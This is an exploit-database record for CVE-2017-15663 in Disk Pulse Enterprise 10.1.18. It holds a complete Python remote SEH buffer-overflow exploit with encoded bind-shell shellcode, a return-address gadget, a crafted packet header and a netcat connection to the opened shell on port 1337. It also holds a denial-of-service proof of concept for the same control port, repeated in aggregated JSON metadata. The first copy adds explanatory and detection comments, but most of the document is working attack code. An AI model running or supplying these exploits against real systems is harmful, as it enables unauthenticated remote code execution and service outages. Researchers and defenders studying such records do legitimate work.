ID EDB-ID:43589
Type exploitdb
Reporter Exploit-DB
Modified 2018-01-15T00:00:00
Description
Disk Pulse Enterprise 10.1.18 - Buffer Overflow. CVE-2017-15663. Remote exploit for Windows platform
# Exploit Title: Disk Pulse Enterprise Server v10.1.18 - Buffer Overflow
# Exploit Author: Ahmad Mahfouz
# Description: Disk Pulse Enterprise Server Unauthenticated Remote Buffer Overflow SEH
# Contact: http://twitter.com/eln1x
# Date: 12/01/2018
# CVE: CVE-2017-15663
# Version: v10.1.18
# Tested on: Windows 7 x64
# Software Link: http://www.diskpulse.com/setups/diskpulsesrv_setup_v10.1.18.exe
from struct import pack
from os import system
from sys import exit
from time import sleep
import socket
# Lab constants for the PoC. Both are hard-coded rather than read from argv,
# so nothing in this script is untrusted input. The script is Python 2
# (print statements, str-typed packet bytes) and does not run unmodified on 3.
#
# Triage note: NVD scores CVE-2017-15663 as availability-only
# (CVSS 3.0 7.5, AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H, CWE-358), whereas this
# PoC claims an unauthenticated SEH overwrite leading to code execution.
# When prioritising, treat the impact as at least what the PoC demonstrates
# rather than what the NVD vector says.
port = 9120 # Disk Pulse Enterprise control-protocol port; the DoS PoC for this CVE uses the same port
host = '192.168.72.231' # author's test host, not taken from the command line
# stage1: x86 stub that adjusts esp by 17*127 + 4 = 2163 bytes and then
# executes jmp esp (per the metasm comments). It sits ahead of the
# shellcode in the payload assembled below.
stage1 = "\x83\xc4\x7f" *17 # metasm > add esp,127
stage1 += "\x83\xc4\x04" # metasm > add esp,4
stage1 += "\xff\xe4" # metasm > jmp esp
# msfvenom -a x86 --platform windows -p windows/shell_bind_tcp LPORT=1337 -f py -b '\x02'
# Output of the msfvenom command above: windows/shell_bind_tcp listening on
# TCP/1337, with \x02 excluded as a bad character (the -b option means the
# bytes are presumably encoder output), behind a 10-byte NOP sled.
# The bytes are opaque and encoder output typically differs between runs, so
# they are not a durable network signature; the 1000-byte request on TCP/9120
# and the listener the payload opens on TCP/1337 are the more stable observables.
buf = "\x90" * 10
buf += "\xb8\x01\x69\xed\x6f\xdd\xc3\xd9\x74\x24\xf4\x5a\x31"
buf += "\xc9\xb1\x53\x31\x42\x12\x83\xea\xfc\x03\x43\x67\x0f"
buf += "\x9a\xbf\x9f\x4d\x65\x3f\x60\x32\xef\xda\x51\x72\x8b"
buf += "\xaf\xc2\x42\xdf\xfd\xee\x29\x8d\x15\x64\x5f\x1a\x1a"
buf += "\xcd\xea\x7c\x15\xce\x47\xbc\x34\x4c\x9a\x91\x96\x6d"
buf += "\x55\xe4\xd7\xaa\x88\x05\x85\x63\xc6\xb8\x39\x07\x92"
buf += "\x00\xb2\x5b\x32\x01\x27\x2b\x35\x20\xf6\x27\x6c\xe2"
buf += "\xf9\xe4\x04\xab\xe1\xe9\x21\x65\x9a\xda\xde\x74\x4a"
buf += "\x13\x1e\xda\xb3\x9b\xed\x22\xf4\x1c\x0e\x51\x0c\x5f"
buf += "\xb3\x62\xcb\x1d\x6f\xe6\xcf\x86\xe4\x50\x2b\x36\x28"
buf += "\x06\xb8\x34\x85\x4c\xe6\x58\x18\x80\x9d\x65\x91\x27"
buf += "\x71\xec\xe1\x03\x55\xb4\xb2\x2a\xcc\x10\x14\x52\x0e"
buf += "\xfb\xc9\xf6\x45\x16\x1d\x8b\x04\x7f\xd2\xa6\xb6\x7f"
buf += "\x7c\xb0\xc5\x4d\x23\x6a\x41\xfe\xac\xb4\x96\x01\x87"
buf += "\x01\x08\xfc\x28\x72\x01\x3b\x7c\x22\x39\xea\xfd\xa9"
buf += "\xb9\x13\x28\x47\xb1\xb2\x83\x7a\x3c\x04\x74\x3b\xee"
buf += "\xed\x9e\xb4\xd1\x0e\xa1\x1e\x7a\xa6\x5c\xa1\x81\x0e"
buf += "\xe8\x47\xe3\x60\xbc\xd0\x9b\x42\x9b\xe8\x3c\xbc\xc9"
buf += "\x40\xaa\xf5\x1b\x56\xd5\x05\x0e\xf0\x41\x8e\x5d\xc4"
buf += "\x70\x91\x4b\x6c\xe5\x06\x01\xfd\x44\xb6\x16\xd4\x3e"
buf += "\x5b\x84\xb3\xbe\x12\xb5\x6b\xe9\x73\x0b\x62\x7f\x6e"
buf += "\x32\xdc\x9d\x73\xa2\x27\x25\xa8\x17\xa9\xa4\x3d\x23"
buf += "\x8d\xb6\xfb\xac\x89\xe2\x53\xfb\x47\x5c\x12\x55\x26"
buf += "\x36\xcc\x0a\xe0\xde\x89\x60\x33\x98\x95\xac\xc5\x44"
buf += "\x27\x19\x90\x7b\x88\xcd\x14\x04\xf4\x6d\xda\xdf\xbc"
buf += "\x9e\x91\x7d\x94\x36\x7c\x14\xa4\x5a\x7f\xc3\xeb\x62"
buf += "\xfc\xe1\x93\x90\x1c\x80\x96\xdd\x9a\x79\xeb\x4e\x4f"
buf += "\x7d\x58\x6e\x5a"
shellcode = buf # alias used by the payload assembly below
# Payload layout, sized to exactly 1000 bytes by construction:
#   124 bytes filler -> 4-byte nSEH (short jmp) -> 4-byte SEH handler address
#   -> stage1 stub -> NOP padding -> shellcode
# The handler address is a pop/pop/ret gadget in libspp.dll, which the
# annotation below records as loaded without ASLR, rebase or SafeSEH.
payload = 'A' * 124 #offset
payload += '\xeb\x09\x90\x90' #jmp over seh return value
payload += '\xcd\x89\x06\x10' #0x100689cd : pop ebp # pop ebx # ret 0x04 | {PAGE_EXECUTE_READ} [libspp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files (x86)\Disk Pulse Enterprise\bin\libspp.dll)
payload += stage1
# NOTE: if the prefix plus stage1 plus shellcode ever exceeded 1000 bytes this
# multiplier would go negative and Python would silently yield '' rather than
# raise, so the 1000-byte invariant is assumed, not enforced.
payload += '\x90' * (1000 - len(payload) - len(shellcode))
payload += shellcode
# Control-protocol header as the PoC builds it: a fixed 4-byte prefix (the DoS
# PoC for this CVE opens with the same prefix and the same \x03 dword), one
# more fixed dword, then the payload length twice and the value of the
# payload's last byte, all little-endian uint32.
# Detection: this prefix on TCP/9120 followed by a declared length of 1000 is
# the wire-level observable. pack() returns str on Python 2, which is why
# concatenating it onto a str literal works here.
header = '\x75\x19\xba\xab'
header += '\x03\x00\x00\x00'
header += '\x00\x40\x00\x00'
header += pack('<I', len(payload))
header += pack('<I', len(payload))
header += pack('<I', ord(payload[-1]))
packet = header
packet += payload
# Delivery (Python 2 print statements). The bare `except:` swallows every
# exception, including KeyboardInterrupt and SystemExit, and reports all of
# them as "unable to communicate"; `exit` is sys.exit, so the handler ends the
# script. The socket is never closed explicitly. `system("nc ...")` passes
# `host` through a shell: harmless while `host` is the hard-coded constant
# above, but it would be a command injection if the value were ever taken from
# user input.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    print "[*] Testing connection to tatget %s:%s" %(host,port)
    s.connect((host, port))
except:
    print "[-] Unable to communicate to target %s:%s" %(host,port)
    exit()
s.send(packet) # single send of header + payload
print "[*] Payload Sent.."
print "[*] Connecting to bind shell %s:1337 .." %host
sleep(3) # fixed delay before trying the listener the payload is expected to open on TCP/1337
system("nc %s 1337"%host)
{"id": "EDB-ID:43589", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Disk Pulse Enterprise 10.1.18 - Buffer Overflow", "description": "Disk Pulse Enterprise 10.1.18 - Buffer Overflow. CVE-2017-15663. Remote exploit for Windows platform", "published": "2018-01-15T00:00:00", "modified": "2018-01-15T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/43589/", "reporter": "Exploit-DB", "references": [], "cvelist": ["CVE-2017-15663"], "lastseen": "2018-01-24T14:21:59", "viewCount": 5, "enchantments": {"score": {"value": 6.4, "vector": "NONE", "modified": "2018-01-24T14:21:59", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-15663"]}, {"type": "exploitdb", "idList": ["EDB-ID:43452"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:145763", "PACKETSTORM:145901"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:BDDF2149B6E579033DBF5F7F9437164D", "EXPLOITPACK:707D979D9B3271E0FBF5BF6A1315ACED"]}, {"type": "zdt", "idList": ["1337DAY-ID-29400"]}], "modified": "2018-01-24T14:21:59", "rev": 2}, "vulnersScore": 6.4}, "sourceHref": "https://www.exploit-db.com/download/43589/", "sourceData": "# Exploit Title: Disk Pulse Enterprise Server v10.1.18 - Buffer Overflow\r\n# Exploit Author: Ahmad Mahfouz \r\n# Description: Disk Pule Enterprise Server Unauthenticated Remote Buffer Overflow SEH\r\n# Contact: http://twitter.com/eln1x\r\n# Date: 12/01/2018\r\n# CVE: CVE-2017-15663\r\n# Version: v10.1.18 \r\n# Tested on: Windows 7 x64\r\n# Software Link: http://www.diskpulse.com/setups/diskpulsesrv_setup_v10.1.18.exe\r\n\r\n \r\n\r\nfrom struct import pack\r\nfrom os import system\r\nfrom sys import exit\r\nfrom time import sleep\r\nimport socket\r\n\r\n \r\n\r\nport = 9120\r\nhost = '192.168.72.231'\r\n\r\n\r\nstage1 = \"\\x83\\xc4\\x7f\" *17 # metasm > add esp,127\r\nstage1 += \"\\x83\\xc4\\x04\"\u00a0\u00a0\u00a0 # metasm > add esp,4\r\nstage1 +=\u00a0 
\"\\xff\\xe4\"\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 # metasm > jmp esp\r\n# msfvenom -a x86 --platform windows -p windows/shell_bind_tcp LPORT=1337 -f py -b '\\x02'\r\n\r\nbuf =\u00a0 \"\\x90\" * 10 \r\nbuf += \"\\xb8\\x01\\x69\\xed\\x6f\\xdd\\xc3\\xd9\\x74\\x24\\xf4\\x5a\\x31\"\r\nbuf += \"\\xc9\\xb1\\x53\\x31\\x42\\x12\\x83\\xea\\xfc\\x03\\x43\\x67\\x0f\"\r\nbuf += \"\\x9a\\xbf\\x9f\\x4d\\x65\\x3f\\x60\\x32\\xef\\xda\\x51\\x72\\x8b\"\r\nbuf += \"\\xaf\\xc2\\x42\\xdf\\xfd\\xee\\x29\\x8d\\x15\\x64\\x5f\\x1a\\x1a\"\r\nbuf += \"\\xcd\\xea\\x7c\\x15\\xce\\x47\\xbc\\x34\\x4c\\x9a\\x91\\x96\\x6d\"\r\nbuf += \"\\x55\\xe4\\xd7\\xaa\\x88\\x05\\x85\\x63\\xc6\\xb8\\x39\\x07\\x92\"\r\nbuf += \"\\x00\\xb2\\x5b\\x32\\x01\\x27\\x2b\\x35\\x20\\xf6\\x27\\x6c\\xe2\"\r\nbuf += \"\\xf9\\xe4\\x04\\xab\\xe1\\xe9\\x21\\x65\\x9a\\xda\\xde\\x74\\x4a\"\r\nbuf += \"\\x13\\x1e\\xda\\xb3\\x9b\\xed\\x22\\xf4\\x1c\\x0e\\x51\\x0c\\x5f\"\r\nbuf += \"\\xb3\\x62\\xcb\\x1d\\x6f\\xe6\\xcf\\x86\\xe4\\x50\\x2b\\x36\\x28\"\r\nbuf += \"\\x06\\xb8\\x34\\x85\\x4c\\xe6\\x58\\x18\\x80\\x9d\\x65\\x91\\x27\"\r\nbuf += \"\\x71\\xec\\xe1\\x03\\x55\\xb4\\xb2\\x2a\\xcc\\x10\\x14\\x52\\x0e\"\r\nbuf += \"\\xfb\\xc9\\xf6\\x45\\x16\\x1d\\x8b\\x04\\x7f\\xd2\\xa6\\xb6\\x7f\"\r\nbuf += \"\\x7c\\xb0\\xc5\\x4d\\x23\\x6a\\x41\\xfe\\xac\\xb4\\x96\\x01\\x87\"\r\nbuf += \"\\x01\\x08\\xfc\\x28\\x72\\x01\\x3b\\x7c\\x22\\x39\\xea\\xfd\\xa9\"\r\nbuf += \"\\xb9\\x13\\x28\\x47\\xb1\\xb2\\x83\\x7a\\x3c\\x04\\x74\\x3b\\xee\"\r\nbuf += \"\\xed\\x9e\\xb4\\xd1\\x0e\\xa1\\x1e\\x7a\\xa6\\x5c\\xa1\\x81\\x0e\"\r\nbuf += \"\\xe8\\x47\\xe3\\x60\\xbc\\xd0\\x9b\\x42\\x9b\\xe8\\x3c\\xbc\\xc9\"\r\nbuf += \"\\x40\\xaa\\xf5\\x1b\\x56\\xd5\\x05\\x0e\\xf0\\x41\\x8e\\x5d\\xc4\"\r\nbuf += \"\\x70\\x91\\x4b\\x6c\\xe5\\x06\\x01\\xfd\\x44\\xb6\\x16\\xd4\\x3e\"\r\nbuf += \"\\x5b\\x84\\xb3\\xbe\\x12\\xb5\\x6b\\xe9\\x73\\x0b\\x62\\x7f\\x6e\"\r\nbuf += \"\\x32\\xdc\\x9d\\x73\\xa2\\x27\\x25\\xa8\\x17\\xa9\\xa4\\x3d\\x23\"\r\nbuf += 
\"\\x8d\\xb6\\xfb\\xac\\x89\\xe2\\x53\\xfb\\x47\\x5c\\x12\\x55\\x26\"\r\nbuf += \"\\x36\\xcc\\x0a\\xe0\\xde\\x89\\x60\\x33\\x98\\x95\\xac\\xc5\\x44\"\r\nbuf += \"\\x27\\x19\\x90\\x7b\\x88\\xcd\\x14\\x04\\xf4\\x6d\\xda\\xdf\\xbc\"\r\nbuf += \"\\x9e\\x91\\x7d\\x94\\x36\\x7c\\x14\\xa4\\x5a\\x7f\\xc3\\xeb\\x62\"\r\nbuf += \"\\xfc\\xe1\\x93\\x90\\x1c\\x80\\x96\\xdd\\x9a\\x79\\xeb\\x4e\\x4f\"\r\nbuf += \"\\x7d\\x58\\x6e\\x5a\"\r\n\r\nshellcode = buf\r\npayload = 'A' * 124\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 #offset\r\npayload +=\u00a0 '\\xeb\\x09\\x90\\x90'\u00a0 #jmp over seh retrun value\r\npayload +=\u00a0 '\\xcd\\x89\\x06\\x10' #0x100689cd : pop ebp # pop ebx # ret 0x04 |\u00a0 {PAGE_EXECUTE_READ} [libspp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\\Program Files (x86)\\Disk Pulse Enterprise\\bin\\libspp.dll)\r\npayload += stage1 \r\npayload +=\u00a0 '\\x90' * (1000 - len(payload) - len(shellcode))\r\npayload += shellcode \r\n\r\n \r\n\r\nheader = '\\x75\\x19\\xba\\xab'\r\nheader += '\\x03\\x00\\x00\\x00'\r\nheader += '\\x00\\x40\\x00\\x00'\r\nheader += pack('<I', len(payload))\r\nheader += pack('<I', len(payload))\r\nheader += pack('<I', ord(payload[-1]))\r\npacket = header\r\npacket += payload \r\n\r\n \r\n\r\n \r\n\r\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n\r\ntry:\r\n\r\n\u00a0\u00a0\u00a0 print \"[*] Testing connection to tatget %s:%s\" %(host,port)\r\n\u00a0\u00a0\u00a0 s.connect((host, port))\r\n\r\nexcept:\r\n\r\n\u00a0\u00a0\u00a0 print \"[-] Unable to communicate to target %s:%s\" %(host,port)\r\n\r\n\u00a0\u00a0\u00a0 exit()\r\n\r\n \r\n\r\ns.send(packet)\r\n\r\nprint \"[*] Payload Sent..\"\r\nprint \"[*] Connecting to bind shell %s:1337 ..\" %host\r\nsleep(3)\r\nsystem(\"nc %s 1337\"%host)", "osvdbidlist": []}
{"cve": [{"lastseen": "2021-02-02T06:36:38", "description": "In Flexense Disk Pulse Enterprise v10.1.18, the Control Protocol suffers from a denial of service vulnerability. The attack vector is a crafted SERVER_GET_INFO packet sent to control port 9120.", "edition": 4, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-01-10T18:29:00", "title": "CVE-2017-15663", "type": "cve", "cwe": ["CWE-358"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-15663"], "modified": "2018-02-01T19:39:00", "cpe": ["cpe:/a:flexense:disk_pulse:10.1.18"], "id": "CVE-2017-15663", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-15663", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:flexense:disk_pulse:10.1.18:*:*:*:enterprise:*:*:*"]}], "exploitdb": [{"lastseen": "2018-01-24T14:18:24", "description": "Disk Pulse Enterprise 10.1.18 - Denial of Service. CVE-2017-15663. 
Dos exploit for Windows platform", "published": "2018-01-08T00:00:00", "type": "exploitdb", "title": "Disk Pulse Enterprise 10.1.18 - Denial of Service", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-15663"], "modified": "2018-01-08T00:00:00", "id": "EDB-ID:43452", "href": "https://www.exploit-db.com/exploits/43452/", "sourceData": "# Exploit Title: Disk Pulse Enterprise Server v10.1.18 - DOS,\r\n# Date: 2017-10-20\r\n# Exploit Author: Ahmad Mahfouz\r\n# Software Link: http://www.diskpulse.com/setups/diskpulsesrv_setup_v10.1.18.exe\r\n# Version: v10.1.18\r\n# Category; Windows Remote DOS\r\n# CVE: CVE-2017-15663\r\n# Author Twitter: @eln1x\r\n# Description In Disk Pulse Enterprise Server v10.1.18, the Control Protocol suffers from a denial of service. The attack vector is a crafted SERVER_GET_INFO packet sent to control port 9120.\r\n\r\n \r\n\r\n \r\n\r\nimport socket\r\ntarget = \"192.168.72.231\"\r\nport = 9120\r\ns = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\r\ns.connect((target,port))\r\n\r\npacket = \"\\x75\\x19\\xba\\xab\\x03\"\r\npacket +=\"\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x1a\"\r\npacket += \"\\x00\"\r\npacket += \"\\x3e\" #evil\r\npacket += \"\\x00\"\r\npacket += \"\\x20\"\r\npacket += \"\\x00\"\r\npacket += \"\\x00\"\r\npacket += \"\\x00\"\r\npacket += \"\\x00\\x00\\x00\\x00\"\r\npacket += \"SERVER_GET_INFO\"\r\npacket += \"\\x02\\x32\\x01\"\r\npacket += \"Data\"\r\npacket += \"\\x01\\x30\\x01\\x00\"\r\npacket += \"\\x04\\x02\\x74\"\r\npacket += \"\\x18\\x18\\x00\"\r\n\r\ns.send(packet)\r\n\r\ntry:\r\n\r\n data = s.recv(100)\r\n print data\r\n\r\nexcept:\r\n\r\n print \"K1LL3D\"", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/43452/"}], "packetstorm": [{"lastseen": "2018-01-10T01:26:45", "description": "", "published": "2018-01-09T00:00:00", "type": "packetstorm", "title": "Disk Pulse Enterprise 10.1.18 Denial Of Service", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-15663"], 
"modified": "2018-01-09T00:00:00", "id": "PACKETSTORM:145763", "href": "https://packetstormsecurity.com/files/145763/Disk-Pulse-Enterprise-10.1.18-Denial-Of-Service.html", "sourceData": "`# Exploit Title: Disk Pulse Enterprise Server v10.1.18 - DOS, \n# Date: 2017-10-20 \n# Exploit Author: Ahmad Mahfouz \n# Software Link: http://www.diskpulse.com/setups/diskpulsesrv_setup_v10.1.18.exe \n# Version: v10.1.18 \n# Category; Windows Remote DOS \n# CVE: CVE-2017-15663 \n# Author Twitter: @eln1x \n# Description In Disk Pulse Enterprise Server v10.1.18, the Control Protocol suffers from a denial of service. The attack vector is a crafted SERVER_GET_INFO packet sent to control port 9120. \n \n \n \n \n \nimport socket \ntarget = \"192.168.72.231\" \nport = 9120 \ns = socket.socket(socket.AF_INET,socket.SOCK_STREAM) \ns.connect((target,port)) \n \npacket = \"\\x75\\x19\\xba\\xab\\x03\" \npacket +=\"\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x1a\" \npacket += \"\\x00\" \npacket += \"\\x3e\" #evil \npacket += \"\\x00\" \npacket += \"\\x20\" \npacket += \"\\x00\" \npacket += \"\\x00\" \npacket += \"\\x00\" \npacket += \"\\x00\\x00\\x00\\x00\" \npacket += \"SERVER_GET_INFO\" \npacket += \"\\x02\\x32\\x01\" \npacket += \"Data\" \npacket += \"\\x01\\x30\\x01\\x00\" \npacket += \"\\x04\\x02\\x74\" \npacket += \"\\x18\\x18\\x00\" \n \ns.send(packet) \n \ntry: \n \ndata = s.recv(100) \nprint data \n \nexcept: \n \nprint \"K1LL3D\" \n \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/145763/diskpulseent10118-dos.txt"}, {"lastseen": "2018-01-16T00:22:40", "description": "", "published": "2018-01-15T00:00:00", "type": "packetstorm", "title": "Disk Pulse Enterprise 10.1.18 Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-15663"], "modified": "2018-01-15T00:00:00", "id": "PACKETSTORM:145901", "href": "https://packetstormsecurity.com/files/145901/Disk-Pulse-Enterprise-10.1.18-Buffer-Overflow.html", "sourceData": 
"`# Exploit Title: Disk Pulse Enterprise Server v10.1.18 - Buffer Overflow \n# Exploit Author: Ahmad Mahfouz \n# Description: Disk Pule Enterprise Server Unauthenticated Remote Buffer Overflow SEH \n# Contact: http://twitter.com/eln1x \n# Date: 12/01/2018 \n# CVE: CVE-2017-15663 \n# Version: v10.1.18 \n# Tested on: Windows 7 x64 \n# Software Link: http://www.diskpulse.com/setups/diskpulsesrv_setup_v10.1.18.exe \n \n \n \nfrom struct import pack \nfrom os import system \nfrom sys import exit \nfrom time import sleep \nimport socket \n \n \n \nport = 9120 \nhost = '192.168.72.231' \n \n \nstage1 = \"\\x83\\xc4\\x7f\" *17 # metasm > add esp,127 \nstage1 += \"\\x83\\xc4\\x04\" # metasm > add esp,4 \nstage1 += \"\\xff\\xe4\" # metasm > jmp esp \n# msfvenom -a x86 --platform windows -p windows/shell_bind_tcp LPORT=1337 -f py -b '\\x02' \n \nbuf = \"\\x90\" * 10 \nbuf += \"\\xb8\\x01\\x69\\xed\\x6f\\xdd\\xc3\\xd9\\x74\\x24\\xf4\\x5a\\x31\" \nbuf += \"\\xc9\\xb1\\x53\\x31\\x42\\x12\\x83\\xea\\xfc\\x03\\x43\\x67\\x0f\" \nbuf += \"\\x9a\\xbf\\x9f\\x4d\\x65\\x3f\\x60\\x32\\xef\\xda\\x51\\x72\\x8b\" \nbuf += \"\\xaf\\xc2\\x42\\xdf\\xfd\\xee\\x29\\x8d\\x15\\x64\\x5f\\x1a\\x1a\" \nbuf += \"\\xcd\\xea\\x7c\\x15\\xce\\x47\\xbc\\x34\\x4c\\x9a\\x91\\x96\\x6d\" \nbuf += \"\\x55\\xe4\\xd7\\xaa\\x88\\x05\\x85\\x63\\xc6\\xb8\\x39\\x07\\x92\" \nbuf += \"\\x00\\xb2\\x5b\\x32\\x01\\x27\\x2b\\x35\\x20\\xf6\\x27\\x6c\\xe2\" \nbuf += \"\\xf9\\xe4\\x04\\xab\\xe1\\xe9\\x21\\x65\\x9a\\xda\\xde\\x74\\x4a\" \nbuf += \"\\x13\\x1e\\xda\\xb3\\x9b\\xed\\x22\\xf4\\x1c\\x0e\\x51\\x0c\\x5f\" \nbuf += \"\\xb3\\x62\\xcb\\x1d\\x6f\\xe6\\xcf\\x86\\xe4\\x50\\x2b\\x36\\x28\" \nbuf += \"\\x06\\xb8\\x34\\x85\\x4c\\xe6\\x58\\x18\\x80\\x9d\\x65\\x91\\x27\" \nbuf += \"\\x71\\xec\\xe1\\x03\\x55\\xb4\\xb2\\x2a\\xcc\\x10\\x14\\x52\\x0e\" \nbuf += \"\\xfb\\xc9\\xf6\\x45\\x16\\x1d\\x8b\\x04\\x7f\\xd2\\xa6\\xb6\\x7f\" \nbuf += \"\\x7c\\xb0\\xc5\\x4d\\x23\\x6a\\x41\\xfe\\xac\\xb4\\x96\\x01\\x87\" \nbuf += 
\"\\x01\\x08\\xfc\\x28\\x72\\x01\\x3b\\x7c\\x22\\x39\\xea\\xfd\\xa9\" \nbuf += \"\\xb9\\x13\\x28\\x47\\xb1\\xb2\\x83\\x7a\\x3c\\x04\\x74\\x3b\\xee\" \nbuf += \"\\xed\\x9e\\xb4\\xd1\\x0e\\xa1\\x1e\\x7a\\xa6\\x5c\\xa1\\x81\\x0e\" \nbuf += \"\\xe8\\x47\\xe3\\x60\\xbc\\xd0\\x9b\\x42\\x9b\\xe8\\x3c\\xbc\\xc9\" \nbuf += \"\\x40\\xaa\\xf5\\x1b\\x56\\xd5\\x05\\x0e\\xf0\\x41\\x8e\\x5d\\xc4\" \nbuf += \"\\x70\\x91\\x4b\\x6c\\xe5\\x06\\x01\\xfd\\x44\\xb6\\x16\\xd4\\x3e\" \nbuf += \"\\x5b\\x84\\xb3\\xbe\\x12\\xb5\\x6b\\xe9\\x73\\x0b\\x62\\x7f\\x6e\" \nbuf += \"\\x32\\xdc\\x9d\\x73\\xa2\\x27\\x25\\xa8\\x17\\xa9\\xa4\\x3d\\x23\" \nbuf += \"\\x8d\\xb6\\xfb\\xac\\x89\\xe2\\x53\\xfb\\x47\\x5c\\x12\\x55\\x26\" \nbuf += \"\\x36\\xcc\\x0a\\xe0\\xde\\x89\\x60\\x33\\x98\\x95\\xac\\xc5\\x44\" \nbuf += \"\\x27\\x19\\x90\\x7b\\x88\\xcd\\x14\\x04\\xf4\\x6d\\xda\\xdf\\xbc\" \nbuf += \"\\x9e\\x91\\x7d\\x94\\x36\\x7c\\x14\\xa4\\x5a\\x7f\\xc3\\xeb\\x62\" \nbuf += \"\\xfc\\xe1\\x93\\x90\\x1c\\x80\\x96\\xdd\\x9a\\x79\\xeb\\x4e\\x4f\" \nbuf += \"\\x7d\\x58\\x6e\\x5a\" \n \nshellcode = buf \npayload = 'A' * 124 #offset \npayload += '\\xeb\\x09\\x90\\x90' #jmp over seh retrun value \npayload += '\\xcd\\x89\\x06\\x10' #0x100689cd : pop ebp # pop ebx # ret 0x04 | {PAGE_EXECUTE_READ} [libspp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\\Program Files (x86)\\Disk Pulse Enterprise\\bin\\libspp.dll) \npayload += stage1 \npayload += '\\x90' * (1000 - len(payload) - len(shellcode)) \npayload += shellcode \n \n \n \nheader = '\\x75\\x19\\xba\\xab' \nheader += '\\x03\\x00\\x00\\x00' \nheader += '\\x00\\x40\\x00\\x00' \nheader += pack('<I', len(payload)) \nheader += pack('<I', len(payload)) \nheader += pack('<I', ord(payload[-1])) \npacket = header \npacket += payload \n \n \n \n \n \ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \n \ntry: \n \nprint \"[*] Testing connection to tatget %s:%s\" %(host,port) \ns.connect((host, port)) \n \nexcept: \n \nprint \"[-] Unable to 
communicate to target %s:%s\" %(host,port) \n \nexit() \n \n \n \ns.send(packet) \n \nprint \"[*] Payload Sent..\" \nprint \"[*] Connecting to bind shell %s:1337 ..\" %host \nsleep(3) \nsystem(\"nc %s 1337\"%host) \n \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/145901/dpe10118-overflow.txt"}], "zdt": [{"lastseen": "2018-03-03T03:34:40", "description": "Exploit for windows platform in category remote exploits", "edition": 1, "published": "2018-01-08T00:00:00", "title": "Disk Pulse Enterprise 10.1.18 - Denial of Service Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-15663"], "modified": "2018-01-08T00:00:00", "href": "https://0day.today/exploit/description/29400", "id": "1337DAY-ID-29400", "sourceData": "# Exploit Title: Disk Pulse Enterprise Server v10.1.18 - DOS,\r\n# Date: 2017-10-20\r\n# Exploit Author: Ahmad Mahfouz\r\n# Software Link: http://www.diskpulse.com/setups/diskpulsesrv_setup_v10.1.18.exe\r\n# Version: v10.1.18\r\n# Category; Windows Remote DOS\r\n# CVE: CVE-2017-15663\r\n# Author Twitter: @eln1x\r\n# Description In Disk Pulse Enterprise Server v10.1.18, the Control Protocol suffers from a denial of service. 
The attack vector is a crafted SERVER_GET_INFO packet sent to control port 9120.\r\n \r\n \r\n \r\n \r\n \r\nimport socket\r\ntarget = \"192.168.72.231\"\r\nport = 9120\r\ns = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\r\ns.connect((target,port))\r\n \r\npacket = \"\\x75\\x19\\xba\\xab\\x03\"\r\npacket +=\"\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x1a\"\r\npacket += \"\\x00\"\r\npacket += \"\\x3e\" #evil\r\npacket += \"\\x00\"\r\npacket += \"\\x20\"\r\npacket += \"\\x00\"\r\npacket += \"\\x00\"\r\npacket += \"\\x00\"\r\npacket += \"\\x00\\x00\\x00\\x00\"\r\npacket += \"SERVER_GET_INFO\"\r\npacket += \"\\x02\\x32\\x01\"\r\npacket += \"Data\"\r\npacket += \"\\x01\\x30\\x01\\x00\"\r\npacket += \"\\x04\\x02\\x74\"\r\npacket += \"\\x18\\x18\\x00\"\r\n \r\ns.send(packet)\r\n \r\ntry:\r\n \r\n data = s.recv(100)\r\n print data\r\n \r\nexcept:\r\n \r\n print \"K1LL3D\"\n\n# 0day.today [2018-03-03] 